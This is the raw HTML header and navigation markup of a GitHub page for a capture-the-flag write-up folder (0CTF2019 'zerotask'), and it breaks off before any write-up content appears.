src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf-write-ups/0CTF2019/zerotask at master · 0n3m4ns4rmy/ctf-write-ups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="D3C2:C14D:2BF3162:2CF7ADC:6412250E" data-pjax-transient="true"/><meta name="html-safe-nonce" content="9b556cec15eb84ee8d4513435afe0a1a9d4436b0fe2d4267867e03455eeac2e5" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJEM0MyOkMxNEQ6MkJGMzE2MjoyQ0Y3QURDOjY0MTIyNTBFIiwidmlzaXRvcl9pZCI6IjczNzM2MDM0ODg5OTQwNDMxNTAiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="3560b3b5cd4d130052776d99fdcf135617cb89decf1434891ac799a49f2a9b38" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:142745576" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to 0n3m4ns4rmy/ctf-write-ups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/136de68f1572911bda3840b5a19dfd7d98dbc2d023201d18f5892a8db807bccc/0n3m4ns4rmy/ctf-write-ups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf-write-ups/0CTF2019/zerotask at master · 0n3m4ns4rmy/ctf-write-ups" /><meta name="twitter:description" content="Contribute to 0n3m4ns4rmy/ctf-write-ups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/136de68f1572911bda3840b5a19dfd7d98dbc2d023201d18f5892a8db807bccc/0n3m4ns4rmy/ctf-write-ups" /><meta property="og:image:alt" content="Contribute to 0n3m4ns4rmy/ctf-write-ups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf-write-ups/0CTF2019/zerotask at master · 0n3m4ns4rmy/ctf-write-ups" /><meta property="og:url" content="https://github.com/0n3m4ns4rmy/ctf-write-ups" /><meta property="og:description" content="Contribute to 0n3m4ns4rmy/ctf-write-ups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/0n3m4ns4rmy/ctf-write-ups git https://github.com/0n3m4ns4rmy/ctf-write-ups.git">
<meta name="octolytics-dimension-user_id" content="41856372" /><meta name="octolytics-dimension-user_login" content="0n3m4ns4rmy" /><meta name="octolytics-dimension-repository_id" content="142745576" /><meta name="octolytics-dimension-repository_nwo" content="0n3m4ns4rmy/ctf-write-ups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="142745576" /><meta name="octolytics-dimension-repository_network_root_nwo" content="0n3m4ns4rmy/ctf-write-ups" />
<link rel="canonical" href="https://github.com/0n3m4ns4rmy/ctf-write-ups/tree/master/0CTF2019/zerotask" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="142745576" data-scoped-search-url="/0n3m4ns4rmy/ctf-write-ups/search" data-owner-scoped-search-url="/users/0n3m4ns4rmy/search" data-unscoped-search-url="/search" data-turbo="false" action="/0n3m4ns4rmy/ctf-write-ups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="6gd8A15qjve04veenA1VPi6hqKby+qlW5kGi9mdx7Se0HhcO+ljqAiap1WMmQ8wZ29YXKW3vJHRPK3iat8xISw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
